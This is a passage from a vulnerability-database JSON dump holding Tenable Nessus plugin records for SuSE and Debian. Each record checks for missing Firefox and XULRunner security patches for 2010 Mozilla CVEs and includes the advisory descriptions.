2025.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(79, 94, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:MozillaFirefox-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-gnomevfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-gnomevfs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-translations-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"MozillaFirefox-3.5.8-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"MozillaFirefox-translations-3.5.8-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner191-1.9.1.8-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.8-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner191-translations-1.9.1.8-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"MozillaFirefox-3.5.8-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"MozillaFirefox-translations-3.5.8-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-1.9.1.8-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.8-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.8-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-32bit-1.9.1.8-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-1.9.1.8-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-32bit-1.9.1.8-1.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"MozillaFirefox-3.5.8-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"MozillaFirefox-translations-3.5.8-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner191-1.9.1.8-1.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.8-1.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner191-translations-1.9.1.8-1.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"mozilla-xulrunner191-32bit-1.9.1.8-1.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.8-1.1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:09:39", "references": ["http://www.mozilla.org/security/announce/2010/mfsa2010-03.html", "http://support.novell.com/security/cve/CVE-2010-0159.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-02.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-05.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-04.html", "http://support.novell.com/security/cve/CVE-2009-3988.html", "http://support.novell.com/security/cve/CVE-2009-1571.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-01.html", "http://support.novell.com/security/cve/CVE-2010-0160.html", "http://support.novell.com/security/cve/CVE-2010-0162.html"], "pluginID": "49900", "description": "Mozilla XUL Runner engine 1.9.0 was upgraded to version 1.9.0.8, fixing various bugs and security issues.\n\nThe following security issues have been fixed :\n\n - Mozilla developers identified and fixed several stability bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these crashes showed evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code. (MFSA 2010-01 / CVE-2010-0159)\n\n - Security researcher Orlando Barrera II reported via TippingPoint's Zero Day Initiative that Mozilla's implementation of Web Workers contained an error in its handling of array data types when processing posted messages. This error could be used by an attacker to corrupt heap memory and crash the browser, potentially running arbitrary code on a victim's computer. (MFSA 2010-02 / CVE-2010-0160)\n\n - Security researcher Alin Rad Pop of Secunia Research reported that the HTML parser incorrectly freed used memory when insufficient space was available to process remaining input. Under such circumstances, memory occupied by in-use objects was freed and could later be filled with attacker-controlled text. These conditions could result in the execution or arbitrary code if methods on the freed objects were subsequently called.\n (MFSA 2010-03 / CVE-2009-1571)\n\n - Security researcher Hidetake Jo of Microsoft Vulnerability Research reported that the properties set on an object passed to showModalDialog were readable by the document contained in the dialog, even when the document was from a different domain. This is a violation of the same-origin policy and could result in a website running untrusted JavaScript if it assumed the dialogArguments could not be initialized by another site. (MFSA 2010-04 / CVE-2009-3988)\n\nAn anonymous security researcher, via TippingPoint's Zero Day Initiative, also independently reported this issue to Mozilla.\n\n - Mozilla security researcher Georgi Guninski reported that when a SVG document which is served with Content-Type: application/octet-stream is embedded into another document via an tag with type='image/svg+xml', the Content-Type is ignored and the SVG document is processed normally. A website which allows arbitrary binary data to be uploaded but which relies on Content-Type: application/octet-stream to prevent script execution could have such protection bypassed. An attacker could upload a SVG document containing JavaScript as a binary file to a website, embed the SVG document into a malicous page on another site, and gain access to the script environment from the SVG-serving site, bypassing the same-origin policy. (MFSA 2010-05 / CVE-2010-0162)", "edition": 5, "reporter": "Tenable", "published": "2010-10-11T00:00:00", "title": "SuSE 10 Security Update : Mozilla XULRunner (ZYPP Patch Number 6866)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2016-12-22T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_MOZILLA-XULRUNNER190-6866.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=49900", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(49900);\n script_version (\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2016/12/22 20:42:28 $\");\n\n script_cve_id(\"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2010-0162\");\n\n script_name(english:\"SuSE 10 Security Update : Mozilla XULRunner (ZYPP Patch Number 6866)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla XUL Runner engine 1.9.0 was upgraded to version 1.9.0.8,\nfixing various bugs and security issues.\n\nThe following security issues have been fixed :\n\n - Mozilla developers identified and fixed several\n stability bugs in the browser engine used in Firefox and\n other Mozilla-based products. Some of these crashes\n showed evidence of memory corruption under certain\n circumstances and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code. (MFSA 2010-01 / CVE-2010-0159)\n\n - Security researcher Orlando Barrera II reported via\n TippingPoint's Zero Day Initiative that Mozilla's\n implementation of Web Workers contained an error in its\n handling of array data types when processing posted\n messages. This error could be used by an attacker to\n corrupt heap memory and crash the browser, potentially\n running arbitrary code on a victim's computer. (MFSA\n 2010-02 / CVE-2010-0160)\n\n - Security researcher Alin Rad Pop of Secunia Research\n reported that the HTML parser incorrectly freed used\n memory when insufficient space was available to process\n remaining input. Under such circumstances, memory\n occupied by in-use objects was freed and could later be\n filled with attacker-controlled text. These conditions\n could result in the execution or arbitrary code if\n methods on the freed objects were subsequently called.\n (MFSA 2010-03 / CVE-2009-1571)\n\n - Security researcher Hidetake Jo of Microsoft\n Vulnerability Research reported that the properties set\n on an object passed to showModalDialog were readable by\n the document contained in the dialog, even when the\n document was from a different domain. This is a\n violation of the same-origin policy and could result in\n a website running untrusted JavaScript if it assumed the\n dialogArguments could not be initialized by another\n site. (MFSA 2010-04 / CVE-2009-3988)\n\nAn anonymous security researcher, via TippingPoint's Zero Day\nInitiative, also independently reported this issue to Mozilla.\n\n - Mozilla security researcher Georgi Guninski reported\n that when a SVG document which is served with\n Content-Type: application/octet-stream is embedded into\n another document via an tag with type='image/svg+xml',\n the Content-Type is ignored and the SVG document is\n processed normally. A website which allows arbitrary\n binary data to be uploaded but which relies on\n Content-Type: application/octet-stream to prevent script\n execution could have such protection bypassed. An\n attacker could upload a SVG document containing\n JavaScript as a binary file to a website, embed the SVG\n document into a malicous page on another site, and gain\n access to the script environment from the SVG-serving\n site, bypassing the same-origin policy. (MFSA 2010-05 /\n CVE-2010-0162)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-01.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-02.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-03.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-04.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-05.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1571.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3988.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0159.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0160.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0162.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6866.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(79, 94, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"mozilla-xulrunner190-1.9.0.18-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"mozilla-xulrunner190-gnomevfs-1.9.0.18-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"mozilla-xulrunner190-translations-1.9.0.18-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-32bit-1.9.0.18-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-gnomevfs-32bit-1.9.0.18-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-translations-32bit-1.9.0.18-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"mozilla-xulrunner190-1.9.0.18-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"mozilla-xulrunner190-gnomevfs-1.9.0.18-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"mozilla-xulrunner190-translations-1.9.0.18-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-32bit-1.9.0.18-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-gnomevfs-32bit-1.9.0.18-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-translations-32bit-1.9.0.18-0.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:00:22", "references": ["https://security-tracker.debian.org/tracker/CVE-2009-3988", "http://www.debian.org/security/2010/dsa-1999", "https://security-tracker.debian.org/tracker/CVE-2010-0159", "https://security-tracker.debian.org/tracker/CVE-2010-0162", "https://security-tracker.debian.org/tracker/CVE-2009-1571", "https://security-tracker.debian.org/tracker/CVE-2010-0160"], "pluginID": "44863", "description": "Several remote vulnerabilities have been discovered in Xulrunner, a runtime environment for XUL applications, such as the Iceweasel web browser. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2009-1571 Alin Rad Pop discovered that incorrect memory handling in the HTML parser could lead to the execution of arbitrary code.\n\n - CVE-2009-3988 Hidetake Jo discovered that the same-origin policy can be bypassed through window.dialogArguments.\n\n - CVE-2010-0159 Henri Sivonen, Boris Zbarsky, Zack Weinberg, Bob Clary, Martijn Wargers and Paul Nickerson reported crashes in layout engine, which might allow the execution of arbitrary code.\n\n - CVE-2010-0160 Orlando Barrera II discovered that incorrect memory handling in the implementation of the web worker API could lead to the execution of arbitrary code.\n\n - CVE-2010-0162 Georgi Guninski discovered that the same origin policy can be bypassed through specially crafted SVG documents.", "edition": 6, "reporter": "Tenable", "published": "2010-02-24T00:00:00", "title": "Debian DSA-1999-1 : xulrunner - several vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2018-07-09T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:5.0", "p-cpe:/a:debian:debian_linux:xulrunner"], "id": "DEBIAN_DSA-1999.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44863", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1999. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44863);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/07/09 14:30:24\");\n\n script_cve_id(\"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2010-0162\");\n script_bugtraq_id(38285, 38286, 38287, 38288, 38289);\n script_xref(name:\"DSA\", value:\"1999\");\n\n script_name(english:\"Debian DSA-1999-1 : xulrunner - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in Xulrunner, a\nruntime environment for XUL applications, such as the Iceweasel web\nbrowser. The Common Vulnerabilities and Exposures project identifies\nthe following problems :\n\n - CVE-2009-1571\n Alin Rad Pop discovered that incorrect memory handling\n in the HTML parser could lead to the execution of\n arbitrary code.\n\n - CVE-2009-3988\n Hidetake Jo discovered that the same-origin policy can\n be bypassed through window.dialogArguments.\n\n - CVE-2010-0159\n Henri Sivonen, Boris Zbarsky, Zack Weinberg, Bob Clary,\n Martijn Wargers and Paul Nickerson reported crashes in\n layout engine, which might allow the execution of\n arbitrary code.\n\n - CVE-2010-0160\n Orlando Barrera II discovered that incorrect memory\n handling in the implementation of the web worker API\n could lead to the execution of arbitrary code.\n\n - CVE-2010-0162\n Georgi Guninski discovered that the same origin policy\n can be bypassed through specially crafted SVG documents.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-3988\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-0159\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-0160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-0162\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2010/dsa-1999\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the xulrunner packages.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 1.9.0.18-1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(79, 94, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"libmozillainterfaces-java\", reference:\"1.9.0.18-1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libmozjs-dev\", reference:\"1.9.0.18-1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libmozjs1d\", reference:\"1.9.0.18-1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libmozjs1d-dbg\", reference:\"1.9.0.18-1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"python-xpcom\", reference:\"1.9.0.18-1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"spidermonkey-bin\", reference:\"1.9.0.18-1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"xulrunner-1.9\", reference:\"1.9.0.18-1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"xulrunner-1.9-dbg\", reference:\"1.9.0.18-1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"xulrunner-1.9-gnome-support\", reference:\"1.9.0.18-1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"xulrunner-dev\", reference:\"1.9.0.18-1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:09:11", "references": ["http://www.mozilla.org/security/announce/2010/mfsa2010-03.html", "http://support.novell.com/security/cve/CVE-2010-0159.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-02.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-05.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-04.html", "http://support.novell.com/security/cve/CVE-2009-3988.html", "http://support.novell.com/security/cve/CVE-2009-1571.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-01.html", "http://support.novell.com/security/cve/CVE-2010-0160.html", "http://support.novell.com/security/cve/CVE-2010-0162.html"], "pluginID": "49891", "description": "Mozilla Firefox was upgraded to version 3.5.8, fixing various bugs and security issues.\n\nThe following security issues have been fixed :\n\n - Mozilla developers identified and fixed several stability bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these crashes showed evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code. (MFSA 2010-01 / CVE-2010-0159)\n\n - Security researcher Orlando Barrera II reported via TippingPoint's Zero Day Initiative that Mozilla's implementation of Web Workers contained an error in its handling of array data types when processing posted messages. This error could be used by an attacker to corrupt heap memory and crash the browser, potentially running arbitrary code on a victim's computer. (MFSA 2010-02 / CVE-2010-0160)\n\n - Security researcher Alin Rad Pop of Secunia Research reported that the HTML parser incorrectly freed used memory when insufficient space was available to process remaining input. Under such circumstances, memory occupied by in-use objects was freed and could later be filled with attacker-controlled text. These conditions could result in the execution or arbitrary code if methods on the freed objects were subsequently called.\n (MFSA 2010-03 / CVE-2009-1571)\n\n - Security researcher Hidetake Jo of Microsoft Vulnerability Research reported that the properties set on an object passed to showModalDialog were readable by the document contained in the dialog, even when the document was from a different domain. This is a violation of the same-origin policy and could result in a website running untrusted JavaScript if it assumed the dialogArguments could not be initialized by another site. (MFSA 2010-04 / CVE-2009-3988)\n\nAn anonymous security researcher, via TippingPoint's Zero Day Initiative, also independently reported this issue to Mozilla.\n\n - Mozilla security researcher Georgi Guninski reported that when a SVG document which is served with Content-Type: application/octet-stream is embedded into another document via an tag with type='image/svg+xml', the Content-Type is ignored and the SVG document is processed normally. A website which allows arbitrary binary data to be uploaded but which relies on Content-Type: application/octet-stream to prevent script execution could have such protection bypassed. An attacker could upload a SVG document containing JavaScript as a binary file to a website, embed the SVG document into a malicous page on another site, and gain access to the script environment from the SVG-serving site, bypassing the same-origin policy. (MFSA 2010-05 / CVE-2010-0162)", "edition": 5, "reporter": "Tenable", "published": "2010-10-11T00:00:00", "title": "SuSE 10 Security Update : Mozilla Firefox (ZYPP Patch Number 6867)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2016-12-22T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_MOZILLAFIREFOX-6867.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=49891", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(49891);\n script_version (\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2016/12/22 20:42:27 $\");\n\n script_cve_id(\"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2010-0162\");\n\n script_name(english:\"SuSE 10 Security Update : Mozilla Firefox (ZYPP Patch Number 6867)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla Firefox was upgraded to version 3.5.8, fixing various bugs and\nsecurity issues.\n\nThe following security issues have been fixed :\n\n - Mozilla developers identified and fixed several\n stability bugs in the browser engine used in Firefox and\n other Mozilla-based products. Some of these crashes\n showed evidence of memory corruption under certain\n circumstances and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code. (MFSA 2010-01 / CVE-2010-0159)\n\n - Security researcher Orlando Barrera II reported via\n TippingPoint's Zero Day Initiative that Mozilla's\n implementation of Web Workers contained an error in its\n handling of array data types when processing posted\n messages. This error could be used by an attacker to\n corrupt heap memory and crash the browser, potentially\n running arbitrary code on a victim's computer. (MFSA\n 2010-02 / CVE-2010-0160)\n\n - Security researcher Alin Rad Pop of Secunia Research\n reported that the HTML parser incorrectly freed used\n memory when insufficient space was available to process\n remaining input. Under such circumstances, memory\n occupied by in-use objects was freed and could later be\n filled with attacker-controlled text. These conditions\n could result in the execution or arbitrary code if\n methods on the freed objects were subsequently called.\n (MFSA 2010-03 / CVE-2009-1571)\n\n - Security researcher Hidetake Jo of Microsoft\n Vulnerability Research reported that the properties set\n on an object passed to showModalDialog were readable by\n the document contained in the dialog, even when the\n document was from a different domain. This is a\n violation of the same-origin policy and could result in\n a website running untrusted JavaScript if it assumed the\n dialogArguments could not be initialized by another\n site. (MFSA 2010-04 / CVE-2009-3988)\n\nAn anonymous security researcher, via TippingPoint's Zero Day\nInitiative, also independently reported this issue to Mozilla.\n\n - Mozilla security researcher Georgi Guninski reported\n that when a SVG document which is served with\n 